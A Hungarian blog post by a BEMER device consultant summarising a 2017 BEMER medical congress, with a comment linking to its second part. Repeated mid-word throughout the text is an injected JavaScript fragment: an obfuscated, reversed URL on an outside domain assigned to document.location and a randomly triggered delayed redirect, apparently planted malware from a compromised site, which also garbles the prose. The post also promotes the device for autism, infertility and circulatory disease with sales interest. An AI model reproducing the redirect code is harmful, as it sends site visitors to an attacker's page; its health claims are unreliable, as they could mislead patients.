2112 Veresegyház, Repkény utca 18 H-P: 7:00-22:00h / Szo-V: 9:00-18:00h +36-20/460-4106

BEMER

Első beszámoló a 2017 szeptemberi  Nemzetközi BEMER Kongresszusról

Első beszámoló a 2017 szeptemberi Nemzetközi BEMER Kongresszusról

Ezzel a bloggal szeretném, ha egy kis betekintést tudnék adni, milyen is volt 2017 szeptember utoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolsó hétvégéje, amikor a BEMER eddigi eredményeiről hallhattunk és oszthattunk meg tapasztalatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokat a Nemzetközi Bemer Orvos kongresszuson.

24 országból voltunk jelen és 7 nyelven történt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolmácsolás. A Hotel Hélia egyik nagyterme teljesen megtelt orvosokkal, egészségügyi szakdolgozókkal. A magyar szervezők Dr. Horváth Ilona és Beck János köszöntője után a BEMER cég első számú vezetői Peter Gleim és Pit Gleim számoltak be az elért eredményekről illetve, hogy milyen irányban is halad az a hajó, amelynek a kapitányai. Azt gondolom, hogy Ők tudják, hogy melyik irányban megyünk. Ezt az irányt én BEMER orvostechnikai tanácsadóként és mérnökként nap mint nap megtapasztalom. Az elmúlt 10 évben az orvosi tanulmányok kiadásával párhuzamosan egyre több beteg keres meg úgy, hogy ez és ez a szakorvos ajánlotta vagy írta a zárójelentésre a BEMER készülék használatát. Egyre több tudományosan is elfogadott – azaz kettős vakpróbás placebo kontrollált- vizsgálati eredmény van, illetve ne feledkezzünk meg a kisebb betegcsoportoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokban szerzett pozitív tapasztalatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokról sem. Az orvoslás számos területéről hallhattunk előadásokat reumatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tológiai esetekről, csontbetegségről, érsebészeti esetek, érszűkület, visszérproblémák és más keringéssel kapcsolatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos megbetegedésekről.

BEMER group

Nagy érdeklődés követte a napjainkban egyre gyakoribb meddőség kérdéskörét, és ezen a hétvégén elsősorban nem a női meddőségről, hanem az elsődlegesen a férfi meddőségről hallhattunk előadásokat. Az andrológiai terület után a BEMER sebgyógyulásban és lábszárfekély kezelésben való alkalmazhatóságról esett szó. BEMER kozmetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tológiában nem igazán betegeknek hasznos, hanem olyan személyeknek, akik a kozmetikai kezelések sorába ez a vegyianyag mentes kozmetikai kezelési módszert szeretnék beilleszteni. Különösen érdekes volt hallani azokat az eseteket, ahol polineuropathiával küzdő embertársain kezelése BEMER eszközökkel milyen eredményesen kezelhetőek. Én személy szerint különösképpen vártam azt az előadást, amely azokról az embertársainkról szól, akik szívemhez nagyon közel álló emberek. Másabbak, mint mi, hiszen jellegzetesebb vagy alig észrevehető autisztikus tünetekkel élnek. Ki ne látta volna az Esőember című filmet Tom Cruise és Dustin Hoffman főszereplésével. Aki látta, tudja miről beszélek. A BEMER tapasztalatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok ezen a területen biztatóak felnőttek és gyermekek esetében is. A következő blogban folytatni szeretném az összefoglalót az orvos kongresszusról és egy kicsit részletesebben is szeretnék írni az előadásokról.

2.rész

Posted Comments
  • Második beszámoló a 2017. szeptemberi Nemzetközi BEMER Kongresszusról - Otthoni Gyógyulás
    Második beszámoló a 2017. szeptemberi Nemzetközi BEMER Kongresszusról - Otthoni Gyógyulás
    […] Előző bloggal elkezdtem egy összefoglalót a 2017. szeptember utolsó hétvégéjén tartott, Nemzetközi Bemer Orvos kongresszuson elhangzottakról. Orvosokkal és más egészségügyi szakemberekkel beszélgetve általános tapasztalat, hogy a BEMER terápiával kapcsolatban először felmerült a kérdés, hogyan valóban hatékony? Valóban azt nyújtja, amit a gyártó és képviselője állít? Közel 10 éve foglalkozom, BEMER terápiával és visszatekintve az időben, azt látom, egyre több orvosi tapasztalat van és egyre többször hallom betegektől, hogy a „kezelőorvosom ajánlotta” , a „zárójelentésben javasolta, hogy pár hónapig használjam”, lombikbébi programban, hogy „beültetés előtt pár hónapig használjam” vagy traumatológiai esetekben „ gyorsabb csontosodás miatt, ajánlott a BEMER használata”. Vannak olyanok is akik csodát várnak. A készülék nem tud csodát tenni, de amit tud- és az adatok is alátámasztják-, a mikro keringés stimulációjával az magáért beszél: […]
    válasz

Comments are closed.